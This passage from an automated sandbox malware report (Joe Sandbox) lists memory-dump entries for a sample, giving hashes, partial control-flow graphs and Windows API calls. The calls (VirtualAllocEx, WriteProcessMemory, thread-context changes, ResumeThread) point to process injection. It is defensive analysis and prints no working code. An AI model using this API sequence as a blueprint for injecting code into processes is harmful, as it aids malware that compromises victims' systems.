                                • Instruction Fuzzy Hash: 255163B1E01658CFDB58CFAAC9446DDBBF2AFC9300F14C4AA9409AB364DB345A85CF40
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 107889aedb62ccce4a162026c523b654c9a3b8266ac13daaafd657ba6a19e92e
                                • Instruction ID: 7bf9318a57ab6a3244610b789769ce82ffda6b06754ba1c04c729d4ffacb0ec6
                                • Opcode Fuzzy Hash: 107889aedb62ccce4a162026c523b654c9a3b8266ac13daaafd657ba6a19e92e
                                • Instruction Fuzzy Hash: 85E13770A1166A8FDB24CF65C98479DFBB6FF89300F1495EAD40DBB214DB719A818F00
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41d5d5ad93d044841b5b7366636ed72a9aa95000be150da17f3e59eb4d62c57c
                                • Instruction ID: 02702a13a8dbd48f11a296474e73e7864f89203fc94ef932a642ca221c173dc2
                                • Opcode Fuzzy Hash: 41d5d5ad93d044841b5b7366636ed72a9aa95000be150da17f3e59eb4d62c57c
                                • Instruction Fuzzy Hash: A1D12570A1166A8FDB64CF69C94479DFBF6BF88300F1495EAD40DAB254DB71AA818F00
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8206956070243b18b3ac7a0b74cc604f0abfb74b33eb7ae98a9fecd37c59d74a
                                • Instruction ID: 09f98630bf6a6ae0674264574ea4d6bec1d60f165bab146791595e64bfc6dfe6
                                • Opcode Fuzzy Hash: 8206956070243b18b3ac7a0b74cc604f0abfb74b33eb7ae98a9fecd37c59d74a
                                • Instruction Fuzzy Hash: 30A106B4E25208DFDF04CFA9D5856ADBFB2FB89300F20906AD426BB254DB349901CF25
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04af83de1db8a5f8d56f193624841d74421298f4f9b4d86f262045f594a9e545
                                • Instruction ID: 80dfb08112db7538d7c6e53cebf02b96e37db88afc41f89e27b765a17bd8c0eb
                                • Opcode Fuzzy Hash: 04af83de1db8a5f8d56f193624841d74421298f4f9b4d86f262045f594a9e545
                                • Instruction Fuzzy Hash: DD91F4B5E142198FDB04CFA9C890AEEFBB2FF89310F24942AD415BB355D73499468F60
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f7a396b4ffbbdbcb0874c70a59ce4d29afbad793a4ca2df4527f1daa185dec76
                                • Instruction ID: e1939582a43ae39701e00597924f22cb1e054d8b2bc382aec06845a38ae043db
                                • Opcode Fuzzy Hash: f7a396b4ffbbdbcb0874c70a59ce4d29afbad793a4ca2df4527f1daa185dec76
                                • Instruction Fuzzy Hash: E391B2B4E142198FDB04CFAAC594AEEFBB2FF89300F24942AD415BB354D73499468F54
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42f675dc45511a647a8190020bb5fafa03b2045c563a28fa6ba0bde9e5c08d6
                                • Instruction ID: ed2daa8d166597d1008d1b52d0732083da5af8dcebb9475eda783bae273ab603
                                • Opcode Fuzzy Hash: b42f675dc45511a647a8190020bb5fafa03b2045c563a28fa6ba0bde9e5c08d6
                                • Instruction Fuzzy Hash: F16112B0E10219EFEF04CFA5D944AAEBBB1FB49304F10987AD422B7254DB789A05DF51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0932dca2626a57c54650de2ffeca10e2fdb6dfd97f2ddfad7db71ffd0b1d8b18
                                • Instruction ID: 7a9320196a410c9bb3568c7d21c44f7d845946aa52f0ed6314889acdefe4660d
                                • Opcode Fuzzy Hash: 0932dca2626a57c54650de2ffeca10e2fdb6dfd97f2ddfad7db71ffd0b1d8b18
                                • Instruction Fuzzy Hash: 9C6135B0E10219EFDB18CFA5C9446AEBBB2FB49304F10987AD422A7254DB389A05DF51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71c57f6691be40a6e3fbe347db9155ad5ff52840013adf17c8abec52abb23cf1
                                • Instruction ID: 1877963153173aaf2564f045b0fe60c92f4e553cbb42e974e8ad6120c4a83d07
                                • Opcode Fuzzy Hash: 71c57f6691be40a6e3fbe347db9155ad5ff52840013adf17c8abec52abb23cf1
                                • Instruction Fuzzy Hash: 8E5108B0D11228CFDB18CFA6C9846DEBBB2BF89310F5084AAD4096B354DB345A96DF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1b1a0b20a773669fdfa4773f7c03ffca4724e59e77313bd0985d443a67e2b61
                                • Instruction ID: ed829c276c22c93a43d111aa38f764b6de57a099ba7783e32cf246ee7c842d2a
                                • Opcode Fuzzy Hash: c1b1a0b20a773669fdfa4773f7c03ffca4724e59e77313bd0985d443a67e2b61
                                • Instruction Fuzzy Hash: 0A411AB0D102288BDB18CFA6C9846DEBBF2BF88310F54C4AAD40977354DB745A96DF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3010ae41e98b004358b5b43a650207420f80ccc4e8299337371470d0c166d5ae
                                • Instruction ID: d4f7382e239d5195c176c2f888f5c5f3a46b4148aec3f4f65694935501a1388d
                                • Opcode Fuzzy Hash: 3010ae41e98b004358b5b43a650207420f80ccc4e8299337371470d0c166d5ae
                                • Instruction Fuzzy Hash: 454119B0D106288BDB18CFA6C984ADEFBF2BF88310F54C4AAD40967354DB345A96CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8499f8ab74490f26a8e0f5d86b673d3b84342a882b929d698aafc413ae457b4e
                                • Instruction ID: 59c7c9f51c8fc7fd9b3459e2ada227d74bc5ca6cec70ae629d2f1bce7e9760f3
                                • Opcode Fuzzy Hash: 8499f8ab74490f26a8e0f5d86b673d3b84342a882b929d698aafc413ae457b4e
                                • Instruction Fuzzy Hash: 3641C5B5E146188BEB18CFAAD9446DEBBF3BF89310F14C0BAD458A7214EB305985CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5d9d9e2bcfd45a7918a869a81bf6eccd62e5b0fa31c8de5557350eab5f53d5a
                                • Instruction ID: 261741a7170f4ba156be89e33a1745c0e21be5d4087f628b0b2af3ae2c168dd7
                                • Opcode Fuzzy Hash: e5d9d9e2bcfd45a7918a869a81bf6eccd62e5b0fa31c8de5557350eab5f53d5a
                                • Instruction Fuzzy Hash: A731C5B1E006198BEB58DFAAD84079EBBB7AFC9200F14C4AAD508A7254DB305A45CF61
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2282f255d9bea259b018680c117bb15fe3997d961297ce7fddf0fd33e9034dc
                                • Instruction ID: c821ee377138915937c8776c820338431b53b6190ff4087627e6b4a8eac65936
                                • Opcode Fuzzy Hash: a2282f255d9bea259b018680c117bb15fe3997d961297ce7fddf0fd33e9034dc
                                • Instruction Fuzzy Hash: 8621DAB1E116189BEB58CF6BDC406DEFBF7AFC9200F04C1BAC518A6254EB3416468F51

                                 Control-flow Graph
                                 • Graph image not captured. Basic blocks: 6002 742bd65; 6003 742bd67-742bd84; 6004 742bd86-742bdb0; 6005 742bd3e-742bd44; 6006 742bdb2-742beb8 (VirtualProtect); 6009 742bec1-742bee2; 6010 742beba-742bec0. Edges: 6002->6003, 6003->6004, 6003->6005, 6004->6003, 6004->6006, 6006->6009, 6006->6010, 6010->6009.
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0742BEAB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1b23583ad0f62d519443e45b5d28a26c09e751d16a96bb4ae99982f495df6445
                                • Instruction ID: 7df52bdf04584dfcc87186b9e712d74a93300c81807b58f88841c76f0dd76153
                                • Opcode Fuzzy Hash: 1b23583ad0f62d519443e45b5d28a26c09e751d16a96bb4ae99982f495df6445
                                • Instruction Fuzzy Hash: 6841E6BB4082589FEB11DF5AE4443DAFBF4EBC9320F60C05BD495AB202C234594A8FE0

                                 Control-flow Graph
                                 • Graph image not captured. Basic blocks: 6014 7b9e640-7b9e68e; 6016 7b9e69e-7b9e6dd (WriteProcessMemory); 6017 7b9e690-7b9e69c; 6019 7b9e6df-7b9e6e5; 6020 7b9e6e6-7b9e716. Edges: 6014->6016, 6014->6017, 6016->6019, 6016->6020, 6017->6016, 6019->6020.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B9E6D0
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 140df64f6b1f290041809d1f06d6f2f352b687f4c3fa9b1097043c06dec2979f
                                • Instruction ID: dc9d9480f13910b915cf25e5073cc1b22a04b2a08e20e7a33702dbc439aee4ba
                                • Opcode Fuzzy Hash: 140df64f6b1f290041809d1f06d6f2f352b687f4c3fa9b1097043c06dec2979f
                                • Instruction Fuzzy Hash: D52124B29003499FDF10CFAAC885BDEBBF5FF48310F10842AE918A7240C7789954CBA4
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B9F0AE
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: d0ad12aad37bd4a847fe3295ee0e3c534e5b5647faf84c233085520ee86ead65
                                • Instruction ID: fd9dec6d80a20d68463c672ed4cfa42524b30bf629e025c27a1aabf1e2b67ae8
                                • Opcode Fuzzy Hash: d0ad12aad37bd4a847fe3295ee0e3c534e5b5647faf84c233085520ee86ead65
                                • Instruction Fuzzy Hash: A72147B19003099FEB10DFAAC4857EEBBF4EF88324F14842AD519A7240CB799944CFA5

                                 Control-flow Graph
                                 • Graph image not captured. Basic blocks: 6024 7b9d818-7b9d863; 6026 7b9d873-7b9d8a3 (Wow64GetThreadContext); 6027 7b9d865-7b9d871; 6029 7b9d8ac-7b9d8dc; 6030 7b9d8a5-7b9d8ab. Edges: 6024->6026, 6024->6027, 6026->6029, 6026->6030, 6027->6026, 6030->6029.
                                APIs
                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07B9D896
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 3198111bd772823d0418e82915d2a4cbcd3f501b23e9fdcd66f02ef48378fb7a
                                • Instruction ID: 34e9fde9ef584ee12cdf2e61f38795ff55eda8158263b80163435636438cf435
                                • Opcode Fuzzy Hash: 3198111bd772823d0418e82915d2a4cbcd3f501b23e9fdcd66f02ef48378fb7a
                                • Instruction Fuzzy Hash: D42135B1D003099FEB10DFAAC4857AEFBF4EF88310F14842AD529A7241CB789944CFA5
                                APIs
                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07B9EE07
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 23aebd70e43a9c249caf6f7551f86bf6549a25328fbfeebe7818f63412a93992
                                • Instruction ID: f86c4d722041dc8e4dcef8178ba6dd72e524b5143b38a0185c31de7fb6929b0a
                                • Opcode Fuzzy Hash: 23aebd70e43a9c249caf6f7551f86bf6549a25328fbfeebe7818f63412a93992
                                • Instruction Fuzzy Hash: 152138B18003499FDB10DFAAC445BEEBBF5EF88310F108429D519A7250C7399944CFA1
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 055AC668
                                Memory Dump Source
                                • Source File: 00000001.00000002.2893918898.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_55a0000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 909206284e9657f8378a34062978d910a3b4a7869246527d479366e3426cc703
                                • Instruction ID: 9466f4cf229ddcac788780d3e7a1b674f4392d8ed09d8945af9b79f7a1e6668e
                                • Opcode Fuzzy Hash: 909206284e9657f8378a34062978d910a3b4a7869246527d479366e3426cc703
                                • Instruction Fuzzy Hash: BF2147B2C0065A9BDB14CF9AC54579EFBF4FF48710F108129E919B7240D738A944CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0742BEAB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: c17921817d3c1998e06ba18e5b45eedbde95069687fe2e31272fb04b5df7c653
                                • Instruction ID: 1d011c167af77f828c42219df6f6366cc7e682cefc86e2402fffa8d4ec10ed7c
                                • Opcode Fuzzy Hash: c17921817d3c1998e06ba18e5b45eedbde95069687fe2e31272fb04b5df7c653
                                • Instruction Fuzzy Hash: E42103B19002499FDB10CF9AC484BDEFBF4EF48320F10842AE958A7250D378A944CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B94ABB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 776adafe13d50315937988882e37b1ca9630cf18eace2122eaf6fc9ae40a37c4
                                • Instruction ID: 99499723524f066daac0fc3ce2caad0f4f08d00263e4d7c591997d6d1561d14d
                                • Opcode Fuzzy Hash: 776adafe13d50315937988882e37b1ca9630cf18eace2122eaf6fc9ae40a37c4
                                • Instruction Fuzzy Hash: 522103B59002499FDB10CF9AC484BDEFBF4EB48320F108429E968A7250D378AA44CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B94ABB
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8b9446ee1d29e6653a3a9171478339b9c5fac00713c92c928fecfbca745edca3
                                • Instruction ID: 15a8043dc4b721db7c36841f49cd3aa286b0789d6664c636aba0bb3f6ac17618
                                • Opcode Fuzzy Hash: 8b9446ee1d29e6653a3a9171478339b9c5fac00713c92c928fecfbca745edca3
                                • Instruction Fuzzy Hash: E92136B5900249DFDB10CF9AC584BDEBBF4EF48310F108429E528A3650D3789944CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B9DF6E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 3157d32c56c9bac838e40b52416f47c2bbde6b58971e2c5c13d21e0ee05d65e0
                                • Instruction ID: 85bd0a8b9053d3a6ca3d477e5829298f6d3b0df10527d9c26de1d31cfd4b3b4b
                                • Opcode Fuzzy Hash: 3157d32c56c9bac838e40b52416f47c2bbde6b58971e2c5c13d21e0ee05d65e0
                                • Instruction Fuzzy Hash: 371156B29003499FDF10DFAAC845BDEBBF5EF88310F108429E519A7250C7359904CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 0405417d0c4fd13b992f3fa566feb86eebf08073429f93fd5d8933f1795bd426
                                • Instruction ID: 5c6d5544bda0daa28098c74e53076816d4b326649c44b2eb86f4f5674e36107a
                                • Opcode Fuzzy Hash: 0405417d0c4fd13b992f3fa566feb86eebf08073429f93fd5d8933f1795bd426
                                • Instruction Fuzzy Hash: 25113AB19003498FDB10DFAAC4457EEFBF4EF88724F248429D519A7250CB79A944CFA5
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B9F795
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 135dc489204ec05e27c6eb1f05a03834879b868526b2440dd1adb0d842a2316f
                                • Instruction ID: 0beffb49c55ed3780c6e02c13dccce9f111709618e269aac713b89cd8dc1e734
                                • Opcode Fuzzy Hash: 135dc489204ec05e27c6eb1f05a03834879b868526b2440dd1adb0d842a2316f
                                • Instruction Fuzzy Hash: 461106B5800349DFDB10DF99C585BEEBBF8EB48324F108469E928A7310C379A954CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: eb8f4f93da4205631345a6b599a654e3f0fb5d88265d21edd716d4b0ee93b0dd
                                • Instruction ID: f16ad314a49315e22a6d9f85e99a4efeaad89f6e036d037e1b119209db788bb6
                                • Opcode Fuzzy Hash: eb8f4f93da4205631345a6b599a654e3f0fb5d88265d21edd716d4b0ee93b0dd
                                • Instruction Fuzzy Hash: B441869160E3D04FD703977898242597FB2AF8B214B1E01DBD1C6CF6E3C9198C0A83A6
                                APIs
                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00CC17C9,?,?), ref: 00CC1D78
                                Memory Dump Source
                                • Source File: 00000001.00000002.2880241074.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_cc0000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 06473762c7a27e7b5755e1fafda93bdaac437f23d0b174af7d65e90ab8dbdea7
                                • Instruction ID: 337f1ded9a524642deda9d4c50a08abdf076009cc4608cd2dcb849a7827c8c69
                                • Opcode Fuzzy Hash: 06473762c7a27e7b5755e1fafda93bdaac437f23d0b174af7d65e90ab8dbdea7
                                • Instruction Fuzzy Hash: 411155B1800749CFDB10DF9AC545BDEBBF4EB49320F148419D929A7351D338A944CFA5
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80cda8a8534ef700eb865e668964318a00e03d049cf4f3a96206f319a339a1ef
                                • Instruction ID: 0f8b39c34933e95c6b151123f0ddb5af94b396f09fd4f0b86dcc8da817cc23f8
                                • Opcode Fuzzy Hash: 80cda8a8534ef700eb865e668964318a00e03d049cf4f3a96206f319a339a1ef
                                • Instruction Fuzzy Hash: 0D527230B153598BC758FB79E89575DBBB6EF88200F4185A9E888E7350DF345C88CB92
                                Memory Dump Source
                                • Source File: 00000001.00000002.2880632329.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e80000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9be88f67291362c1b121b0ad413f9028868e9c1f783c88fe13e38965c83e9ec2
                                • Instruction ID: 50c2f41fc877903c02ac0188c54050f611db580d7036e4229c94a4c56eb6161c
                                • Opcode Fuzzy Hash: 9be88f67291362c1b121b0ad413f9028868e9c1f783c88fe13e38965c83e9ec2
                                • Instruction Fuzzy Hash: 2532D470A042498FDB15DF68C884AAEBBF6EF85314F14846AE40DEB391D735ED46CB90
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ca70e979fd5cf03d59ae7404bb171d89b48cd8a5a1795128bd992f94067fc82
                                • Instruction ID: ac7f064e6159d17ddeab8269270a53817fca0003fc8618ea369ac3656ca80e09
                                • Opcode Fuzzy Hash: 8ca70e979fd5cf03d59ae7404bb171d89b48cd8a5a1795128bd992f94067fc82
                                • Instruction Fuzzy Hash: 56227930A15349CBCB14EBB9E99969D7BF2FB88300F4049A9E899E3344EE345C45CB91
                                • Opcode ID: d60cc5411ce12ecafd071b0a362a36a3e690fd861f35abd2120d03bb0c3a43df
                                • Instruction ID: 43836eced4f7e22daf2f9f4417fbb47170644fd7a44651b5f1104d01ffcd7323
                                • Opcode Fuzzy Hash: d60cc5411ce12ecafd071b0a362a36a3e690fd861f35abd2120d03bb0c3a43df
                                • Instruction Fuzzy Hash: AD019236304214AFD3109A4ADC84F5BFBEDFFD9620F20807AF609D7361CA71AC0186A4
                                Memory Dump Source
                                • Source File: 00000001.00000002.2880632329.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e80000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40451ebe483a9dfac5e42e7603620ada1156234b9611f190a14367102d135d00
                                • Instruction ID: 1747791d285b73b52e94d27c977d7dcce0518f07fcf484b20621900cfa448c3f
                                • Opcode Fuzzy Hash: 40451ebe483a9dfac5e42e7603620ada1156234b9611f190a14367102d135d00
                                • Instruction Fuzzy Hash: 3C01D670519605CFC304BB79ECA911DBBB4EF84610F418969E8CDA3294EE349C58C792
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc6f29e78630de61d45ff640a33b429554ae50139de36036c94e3782f3347556
                                • Instruction ID: c13297178d4f83d1ca51e1d32ee23013019d0726f0b560c3ec09a83039418b87
                                • Opcode Fuzzy Hash: bc6f29e78630de61d45ff640a33b429554ae50139de36036c94e3782f3347556
                                • Instruction Fuzzy Hash: 0901D67BB0552A1BE705E66D9C94ABFB2EFFFC4154B158439D444E7340EE30CC014294
                                Memory Dump Source
                                • Source File: 00000001.00000002.2880632329.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e80000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efe9b743fb3f788e6984c5fa1c627d5166bc635891d24e4952ca90d965aeceb3
                                • Instruction ID: 4f13a5ec2af77de202ccba387a9ec04b694b05712b45a230cb9d52ca84389e8a
                                • Opcode Fuzzy Hash: efe9b743fb3f788e6984c5fa1c627d5166bc635891d24e4952ca90d965aeceb3
                                • Instruction Fuzzy Hash: 75017B726041457FDB02AE669C10AEB3FE6DBC9780F188075FA0DE7291DB31CD129BA1
                                Memory Dump Source
                                • Source File: 00000001.00000002.2880632329.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e80000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 941a1e41837ccf2692be8c5c11a208f4cecf57e607445899f1fd7563a5a589c8
